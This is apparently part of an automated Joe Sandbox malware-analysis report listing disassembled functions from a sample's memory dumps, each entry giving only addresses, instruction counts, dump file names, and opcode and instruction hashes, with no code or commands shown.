Opcode ID: 6a2a77b1f6b06f344140212e252cdc2ef633ad974a3c33b585d8b6bca7271d1c
Instruction ID: 9a39fdf3be33768fb991287a888165f16efcef422bc4e8f8e9a4daf6eb756287
Opcode Fuzzy Hash: 6a2a77b1f6b06f344140212e252cdc2ef633ad974a3c33b585d8b6bca7271d1c
Instruction Fuzzy Hash: 8CC1C074E00218CFEB55DFA5C984B9DBBB2BF89304F2081A9D809AB355DB359E85CF50

Function 067D2968 Relevance: .3, Instructions: 268
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000002.00000002.4590356989.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_67d0000_TLS20242025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1fb4e9b77e5fddcb088ae67eaaff6944cc54e74599ed763f102935892f2cc2be
Instruction ID: 476a7760a15c6ce75f783d03560ed3b6ab1a7a005a67cb950d1f54002469fc63
Opcode Fuzzy Hash: 1fb4e9b77e5fddcb088ae67eaaff6944cc54e74599ed763f102935892f2cc2be
Instruction Fuzzy Hash: C9C1BF74E01218CFDB54DFA5C944B9DBBB2FF88304F2081A9D919A7355DB359A81CF10

Function 0105C147 Relevance: .2, Instructions: 235COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4584968696.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1050000_TLS20242025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 28b5bc22f27deddcd2e0c74bbc06e4049e161be63099c3dde0eb02eb1d3028a3
Instruction ID: 26c274adf7f9046473c553ddc81e9c3f48654dea77a0cf360bd42ff9ce7d0c6f
Opcode Fuzzy Hash: 28b5bc22f27deddcd2e0c74bbc06e4049e161be63099c3dde0eb02eb1d3028a3
Instruction Fuzzy Hash: B2A13B70E00358CFEB54CFA9D984A9EBBF6BF89300F1480A9D849AB365DB749941CF50

Function 067D2DB8 Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4590356989.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_67d0000_TLS20242025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4a7bb0c1ae11a5ad70d76850853d23cb01002235613d7d431dfbb86115f70c6
Instruction ID: fdf25d3ca2a9c653a8e53015e50720b557cd6aa69d4544a3f100646652c1b930
Opcode Fuzzy Hash: f4a7bb0c1ae11a5ad70d76850853d23cb01002235613d7d431dfbb86115f70c6
Instruction Fuzzy Hash: 68A10670D002088FEB14DFA9C844BEDBBB1FF89300F249669D519A72A2DB759A85CF54

Function 067D1E80 Relevance: .2, Instructions: 220COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4590356989.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_67d0000_TLS20242025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d71595cce7823909728439debe3dac80285b1441ab02e214cb795745f1eadf13
Instruction ID: f0de4b247cbec57d8b9b426200a633a9d8552386f4b2cec77f83374eb876c4ab
Opcode Fuzzy Hash: d71595cce7823909728439debe3dac80285b1441ab02e214cb795745f1eadf13
Instruction Fuzzy Hash: 66A1A274E012288FEB68CF6AC954B9DFBF2BF88300F14C1A9D508A7255DB745A85CF51

Function 067D2DC8 Relevance: .2, Instructions: 220COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4590356989.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_67d0000_TLS20242025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d36e55fc39a0f4ff900d75838d2012f5c191c24dff2483eec7fd47272ef081e
Instruction ID: 22eb9164516db1b4ce09e97d663abeed4a30d7ca53a5e697b889d4e885f66541
Opcode Fuzzy Hash: 2d36e55fc39a0f4ff900d75838d2012f5c191c24dff2483eec7fd47272ef081e
Instruction Fuzzy Hash: 78A10670D00218CFEB14DFA9C848BDDBBB1FF89314F248269D518A72A2DB759A85CF50

Function 067D17A0 Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4590356989.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_67d0000_TLS20242025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4475207efba704898118e8772fbebf14b0b89a05f1a0ce14a1101f0a884a01fb
Instruction ID: 20477478e1e8dcc4f49550fad60d3d979298a1b71f53e237f6a65da5cfdaeb8c
Opcode Fuzzy Hash: 4475207efba704898118e8772fbebf14b0b89a05f1a0ce14a1101f0a884a01fb
Instruction Fuzzy Hash: 46A191B5E012288FEB68CF6AC944B9DFBF2BF88300F14C5A9D408A7254DB745A85CF51

Function 067D310E Relevance: .2, Instructions: 202COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4590356989.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_67d0000_TLS20242025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db8bc0b7741f11bf174cde84bf7c6577307e9ec59f928adc75efd29810f89dd8
Instruction ID: 33f81c1385faf1a6ba97bacd770f349d7d27c8943f6d5567a24bc956705c2bca
Opcode Fuzzy Hash: db8bc0b7741f11bf174cde84bf7c6577307e9ec59f928adc75efd29810f89dd8
Instruction Fuzzy Hash: 38910370D00218CFEB50DFA8C848BECBBB1FF49310F249669E519A7292DB759A85CF11

Function 067DFC68 Relevance: .2, Instructions: 200COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4590356989.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_67d0000_TLS20242025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 71c49f36fa9b01414fac0b52c43e29d45ce31e190b77461ced7a616ae5129457
Instruction ID: a49a341722f9491720fa2489affa7bfa63565b96c5d10c02f309b9ae15b7f402
Opcode Fuzzy Hash: 71c49f36fa9b01414fac0b52c43e29d45ce31e190b77461ced7a616ae5129457
Instruction Fuzzy Hash: 6881E174E00258CFDB54EFE9D884BADBBB2BF88304F208529D815AB359DB355942DF50

Function 01055362 Relevance: .2, Instructions: 194COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4584968696.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1050000_TLS20242025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 525ebc28b09aad5ea95c89cb91fa05285b5fd6bb6fc69099328e1b1afeb32e3f
Instruction ID: 0217982d7938d9abe8c416fbac4f2bf3f8ee99cc29c3b8c6c437f563f0dece69
Opcode Fuzzy Hash: 525ebc28b09aad5ea95c89cb91fa05285b5fd6bb6fc69099328e1b1afeb32e3f
Instruction Fuzzy Hash: EF91F674E00258CFDB54CFAAD884A9EBFF2BF89304F1480A9D849AB365DB349945CF10

Function 0105C46A Relevance: .2, Instructions: 188COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4584968696.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1050000_TLS20242025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44a65cfa8c6d61748f50f1392d134847c4a842f571ebf2b0b8273ad830101ff7
Instruction ID: 6e11d36bee863bf845e3fdb00e9c5621b2e7ded2c09bd0df48a704fe7b3e9eee
Opcode Fuzzy Hash: 44a65cfa8c6d61748f50f1392d134847c4a842f571ebf2b0b8273ad830101ff7
Instruction Fuzzy Hash: 7481FA74E00218CFEB54DFAAD944A9EBBF2BF88304F14D069D859AB365DB345981CF50

Function 0105D278 Relevance: .2, Instructions: 186COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4584968696.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1050000_TLS20242025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5c9a51c77eba6b7387edaaa876f490aca8e4152c7ec31d752fd49ba2dc548f7
Instruction ID: 97279fac50f3c48a43cf833b0a969689249b21971d269f5bd3957233dce7fa10
Opcode Fuzzy Hash: e5c9a51c77eba6b7387edaaa876f490aca8e4152c7ec31d752fd49ba2dc548f7
Instruction Fuzzy Hash: 0F81C774E00258CFDB54DFAAD844A9EBBF2BF89300F14D06AE849AB365DB749941CF50

Function 0105CCD8 Relevance: .2, Instructions: 186COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4584968696.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1050000_TLS20242025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c81d1e68070710d8c1d48b32cb9c30c7d0b7ada73633f78b5dbded74bfb7bdcc
Instruction ID: a8db61321752536a70172fb9448d7b6cb066b45c015e9c2cfc88b7f33c4d5c72
Opcode Fuzzy Hash: c81d1e68070710d8c1d48b32cb9c30c7d0b7ada73633f78b5dbded74bfb7bdcc
Instruction Fuzzy Hash: 7581F574E00218CFEB54DFAAD944A9EBBF2BF88300F14D069E849AB365DB745981CF50

Function 0105CA08 Relevance: .2, Instructions: 185COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4584968696.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1050000_TLS20242025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce5ff9e39a1d39316b701b932fe0f8fad5aa629d19e77039c2d391c883c9983e
Instruction ID: 85264e360cb334ac4f394d94d785f6476b8cbf5456323622a3db30c0061d9ceb
Opcode Fuzzy Hash: ce5ff9e39a1d39316b701b932fe0f8fad5aa629d19e77039c2d391c883c9983e
Instruction Fuzzy Hash: 0181E874E00218CFEB54DFAAD944A9EBBF2BF88300F14D069E859AB365DB749941CF50

Function 0105CFAA Relevance: .2, Instructions: 185COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4584968696.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1050000_TLS20242025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 60e6026e8eeaf9f24bbdfb7e63fd0281a8ecd124c2a7188ad8b4b0cc6c56bc9a
Instruction ID: dae681aa41b3e27bfd2561135f7daaa44eef218cd090c308a199ea95a5af59c9
Opcode Fuzzy Hash: 60e6026e8eeaf9f24bbdfb7e63fd0281a8ecd124c2a7188ad8b4b0cc6c56bc9a
Instruction Fuzzy Hash: 2C81E974E00218DFDB54DFAAD844A9EBBF2BF88300F14D06AE849AB365DB349941CF50

Function 0105C738 Relevance: .2, Instructions: 182COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4584968696.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1050000_TLS20242025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 277cc2cdd045955b02634735448bd4dd4235fb938f50f402517fe3b5d1131b3f
Instruction ID: dbe367d598fc1af2ec2b53a1261cae78546e76cf2242f192366c49a1fdd68a30
Opcode Fuzzy Hash: 277cc2cdd045955b02634735448bd4dd4235fb938f50f402517fe3b5d1131b3f
Instruction Fuzzy Hash: 2F81D574E00218CFEB54DFAAD944A9EBBF2BF88300F14D069E859AB365DB749941CF50

Function 067D0B20 Relevance: .2, Instructions: 169COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4590356989.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_67d0000_TLS20242025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6c85947d9034cc06dd1b890f5b69e072ae3943f26f6cfa2e07fa4c2019d7ed0
Instruction ID: f608c4a91bdf5f2f3b761d721bbd0c2bd9a68e47ac09a2f1dd69a7a6e54eed05
Opcode Fuzzy Hash: f6c85947d9034cc06dd1b890f5b69e072ae3943f26f6cfa2e07fa4c2019d7ed0
Instruction Fuzzy Hash: 0571E474E01268CFDB64DF66D9847EDBBF2BF89300F1494AAD409A7264DB345A82CF40

Function 067D178F Relevance: .2, Instructions: 165COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4590356989.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_67d0000_TLS20242025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 468fe8437d226455497643ba8be1ce1f729fe6f928ac7e86bc7ca7d699f99085
Instruction ID: b4d15c1860cdc53131d4ece3ed927f3039517ed1c004bf60252f046253f2931d
Opcode Fuzzy Hash: 468fe8437d226455497643ba8be1ce1f729fe6f928ac7e86bc7ca7d699f99085
Instruction Fuzzy Hash: 548196B5E016188FEB68CF6AC944B9DFBF2AF88300F14C1E9D408A7254DB745A85CF11

Function 0105F2C0 Relevance: .2, Instructions: 150COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4584968696.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1050000_TLS20242025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ae91152c2f85d7375ac15b46a7684d4da05b949e8c2e3733fee45dbcbd557c0
Instruction ID: 81d38bce69b73d76e9ea43eed479ead2ccf31abe7909f8793ccfcac1ece4fdea
Opcode Fuzzy Hash: 0ae91152c2f85d7375ac15b46a7684d4da05b949e8c2e3733fee45dbcbd557c0
Instruction Fuzzy Hash: C1511870D01209CBEB44EFA9D5487DEBBF2FB89304F54C169C844AB299DB799982CF50

Function 0105F52F Relevance: .1, Instructions: 148COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4584968696.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1050000_TLS20242025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 815491e53526118ff287902f8e1cfaa52da4eb89309e6403e82ee0818b158d42
Instruction ID: deb838c7e34acd664264e1eab91b22c79ffe18b73dd9353293e0d2df90a2b398
Opcode Fuzzy Hash: 815491e53526118ff287902f8e1cfaa52da4eb89309e6403e82ee0818b158d42
Instruction Fuzzy Hash: 51514A70D0520ACFDB45EFA8D5887EEBBF2FB49304F548169C884AB259DB799881CF50

Function 0105E97A Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4584968696.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1050000_TLS20242025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e82a902c2119ff7c7e04221200854fd26e66c21f8e57f874b0e9b7902da934b3
Instruction ID: 0ccb06076645cbcf65b90b2eee957f961502065b730cb3f6f18446435439b2fe
Opcode Fuzzy Hash: e82a902c2119ff7c7e04221200854fd26e66c21f8e57f874b0e9b7902da934b3
Instruction Fuzzy Hash: 3751B574E00208DFEB59DFBAD444A9EFBB2BF88300F249029E955AB365DB705941CF15

Function 0105E988 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4584968696.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1050000_TLS20242025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f9f5e95d98fc1ba368ac380ea020aa010d091dd10306ab6858b0c7019f8ff87
Instruction ID: 8a6ff664ce65baf969a698668ea63fbfbfd9a975708300add21377d34f6d1922
Opcode Fuzzy Hash: 3f9f5e95d98fc1ba368ac380ea020aa010d091dd10306ab6858b0c7019f8ff87
Instruction Fuzzy Hash: C151A674E00208DFEB58DFBAD544A9EFBB2BF88300F249029E955AB365DB705941CF15

Function 0105F4AC Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4584968696.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1050000_TLS20242025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bdc705dec3b9c5dddf54b225cbd6c3f09f23b6e22b79297f96b4334a0623c56
Instruction ID: b7064ffdd1c8c9113b79a4168a7328c7a89e2bae5f3a5bf07541c135a86199ba
Opcode Fuzzy Hash: 5bdc705dec3b9c5dddf54b225cbd6c3f09f23b6e22b79297f96b4334a0623c56
Instruction Fuzzy Hash: A2513870D0121ACFDB44EFA8D5847EEBBF2FB48304F648169C885AB294CB799981CF50

Function 067DE24B Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4590356989.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_67d0000_TLS20242025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4218abf27698b9aba6f0b7dc89938c7482000808c8fe5bd27bb8e81c1fb3552c
Instruction ID: a0721e7bc69bb3e3a5dab629c58c01c2f6889f1da1dd05105b81ceaa3daeb20a
Opcode Fuzzy Hash: 4218abf27698b9aba6f0b7dc89938c7482000808c8fe5bd27bb8e81c1fb3552c
Instruction Fuzzy Hash: 08411770E01248CBEB59DFAAD9446EDBBF2AF89300F24C129C514BB264EB355946CF50

Function 067D295F Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4590356989.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_67d0000_TLS20242025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98a28fb23d5d93287c842b325ed50c74d2a918ebec378245ba8d4d321c415dd6
Instruction ID: ac00f7f7327645a2121a662615bd319b580df03a14fc2eb0b9036eb2829bbf35
Opcode Fuzzy Hash: 98a28fb23d5d93287c842b325ed50c74d2a918ebec378245ba8d4d321c415dd6
Instruction Fuzzy Hash: 5441F674E01248CFEB58DFAAD9446ADFBB2BF89300F24C12AC525B7259DB344A46CF40

Function 067D992C Relevance: 1.6, APIs: 1, Instructions: 62
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(00000000), ref: 067D9A6E

Memory Dump Source

Source File: 00000002.00000002.4590356989.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_67d0000_TLS20242025.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 00f8b68f94678ccc7872014e95dfe16b3dd38f416fb64a614a20c426e7551c3c
Instruction ID: 88a33c4540605d818076d5e0a856315b4eb63224617da193e8a62501e8f4a140
Opcode Fuzzy Hash: 00f8b68f94678ccc7872014e95dfe16b3dd38f416fb64a614a20c426e7551c3c
Instruction Fuzzy Hash: F7119774E002198FEB44DFE8D884BADB7B5FBC8314F148625EA48A7242D770E942CB60

Function 0105E007 Relevance: .7, Instructions: 654COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4584968696.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1050000_TLS20242025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 817a8630f62437bf29b02063d660c5be48e03d9272312567142a748accf97714
Instruction ID: aa5ba096ffb51754ff03c2b6eff6c518fe5cab1f6fd0115066bbf574e5524f42
Opcode Fuzzy Hash: 817a8630f62437bf29b02063d660c5be48e03d9272312567142a748accf97714
Instruction Fuzzy Hash: 8A12A8344226539FE2682F24E5AC12EBB61FB4F727714ED20F02BC0459EB7554DA8F62

Function 0105E018 Relevance: .6, Instructions: 647
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000002.00000002.4584968696.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1050000_TLS20242025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ade37630d46e74ca0efcf5e4725c7e91fe13742261d03367d8b554eb39ba08fb
Instruction ID: d17e4af1e759ed6a605cf520475c848b873a0863130ac98f2fa98175dd88338b
Opcode Fuzzy Hash: ade37630d46e74ca0efcf5e4725c7e91fe13742261d03367d8b554eb39ba08fb
Instruction Fuzzy Hash: D71298344226539FA6683F24E5AC12EBB61FB4F727714ED20B02FC0449EB7554DA8F62

Function 01050C8F Relevance: .5, Instructions: 546
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000002.00000002.4584968696.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1050000_TLS20242025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 963421ac7c69873f84df05301443b8411ed70c49e3773ab32ac34912b16680c3
Instruction ID: 74f5eb0488fca42126e4f07283bfb8cc9343ae9c53ea7131affb1d326cdd691e
Opcode Fuzzy Hash: 963421ac7c69873f84df05301443b8411ed70c49e3773ab32ac34912b16680c3
Instruction Fuzzy Hash: A452ED74A00219CFCB65EF24EE94A9DBBB2FF88305F5085A9D509AB758DB705E81CF40

Function 01050CA0 Relevance: .5, Instructions: 539
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000002.00000002.4584968696.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1050000_TLS20242025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40d979533db4d49afba89bcb745c45a6812f339304aa4237bf47272b23eada7e
Instruction ID: 2db5d61a0c4db9cddda96224e70322eddc2b3a93199d53c3487e04cb1239321a
Opcode Fuzzy Hash: 40d979533db4d49afba89bcb745c45a6812f339304aa4237bf47272b23eada7e
Instruction Fuzzy Hash: 0252ED74A00219CFCBA5EF24EE94A9DBBB2FF88305F5085A9D509A7758DB305E81CF40

Function 010576F1 Relevance: .5, Instructions: 477
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000002.00000002.4584968696.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1050000_TLS20242025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a58b3e3821f7407cc61252068dd285f7af389f76cbea7c4b5dd6374a1a3e3c69
Instruction ID: d486723f790a3f4ea4cb2c7d508552136725d7f4d313839b621f22bc59be24b1
Opcode Fuzzy Hash: a58b3e3821f7407cc61252068dd285f7af389f76cbea7c4b5dd6374a1a3e3c69
Instruction Fuzzy Hash: AA125C30A00249DFDB95CF68D884AAEBFF1FF89314F548599E9859B261DB30ED41CB50

Function 01055F38 Relevance: .3, Instructions: 266
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000002.00000002.4584968696.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1050000_TLS20242025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd515eeb4b4ad9d0e15ab4b4e002b84d947700a97a30c1e97cae3c7568388e27
Instruction ID: b77bdaeb11873d551d38c55602c3dd6b061c098b5c68d571acf1f7cdd5a814d7
Opcode Fuzzy Hash: bd515eeb4b4ad9d0e15ab4b4e002b84d947700a97a30c1e97cae3c7568388e27
Instruction Fuzzy Hash: B491AF303042458FDB59AF68D854B7F7BE2AFC9300F188469E9868B396CF358C42CB95

Function 01056498 Relevance: .2, Instructions: 231COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4584968696.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1050000_TLS20242025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c56314fe52d3b86ec3f7bd067155c9e75a8af540c2f0866b55209b7b30292a5
Instruction ID: 8fea94f746db6cceed934029ac1ac94b45541ac425a90411dd81c1cc69807417
Opcode Fuzzy Hash: 2c56314fe52d3b86ec3f7bd067155c9e75a8af540c2f0866b55209b7b30292a5
Instruction Fuzzy Hash: 6A819F34A00505CFDB98CF6DC4849AEBBF2FF89214B9481A9D985D7365DB32EC41CB61

Function 010580D8 Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4584968696.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1050000_TLS20242025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c5d858d91c7a27fddde9f39ea9daf19f98e00f8393ff4816c3d704d21d2fd47
Instruction ID: e8e5ae0603dbb51eb142cb2e370e2d40f4493e33c64572fa1ffba1233734f1b7
Opcode Fuzzy Hash: 3c5d858d91c7a27fddde9f39ea9daf19f98e00f8393ff4816c3d704d21d2fd47
Instruction Fuzzy Hash: B77128347006058FDBA5DF6EC884AAE7FE5AF89280B1580AAED52DB361DB70DC41CB50

Function 0105F71F Relevance: .2, Instructions: 155COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4584968696.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1050000_TLS20242025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e6a7dd2c7c44043ba9b047e5034384397213228cb40afd73b7ddb7f2481fd07
Instruction ID: 39d80f888339d7881ebad5ec07e11b0edbea2c964e49236c9e3c5f5e7fcc56d5
Opcode Fuzzy Hash: 4e6a7dd2c7c44043ba9b047e5034384397213228cb40afd73b7ddb7f2481fd07
Instruction Fuzzy Hash: 8C613134E01219DFDB15DFE4D844AAEBBB2FF88304F208529D905AB355DB795A45CF40

Function 01059C30 Relevance: .2, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4584968696.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1050000_TLS20242025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d1756bc82a15e9e86948a3a8ef505def686d4bac3a745ccdcf3d746948f7667
Instruction ID: a74207a676763ca19b56179be687be8bf2403efabfc3d6849ebe06b4815c7522
Opcode Fuzzy Hash: 5d1756bc82a15e9e86948a3a8ef505def686d4bac3a745ccdcf3d746948f7667
Instruction Fuzzy Hash: B3518F30700245DFDB55DF68C844BAFBBE6EB88354F1484A6E949CB256DB71CC41CBA1

Function 0105AEF0 Relevance: .1, Instructions: 142COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4584968696.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1050000_TLS20242025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 582a5d105d926d64222163810b528ca72a47f2e5e6b4bcc87f7f32937746e459
Instruction ID: a3a12cccf104681a681adbd089049bf0ba59a6fcf95b29d4b615592ef38c393e
Opcode Fuzzy Hash: 582a5d105d926d64222163810b528ca72a47f2e5e6b4bcc87f7f32937746e459
Instruction Fuzzy Hash: E04124317042449FC7199F78D814AAEBFF6AFC9210B1880AAE956D7292DE319C05CBA0

Function 0105D548 Relevance: .1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4584968696.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false

Joe Sandbox IDA Plugin

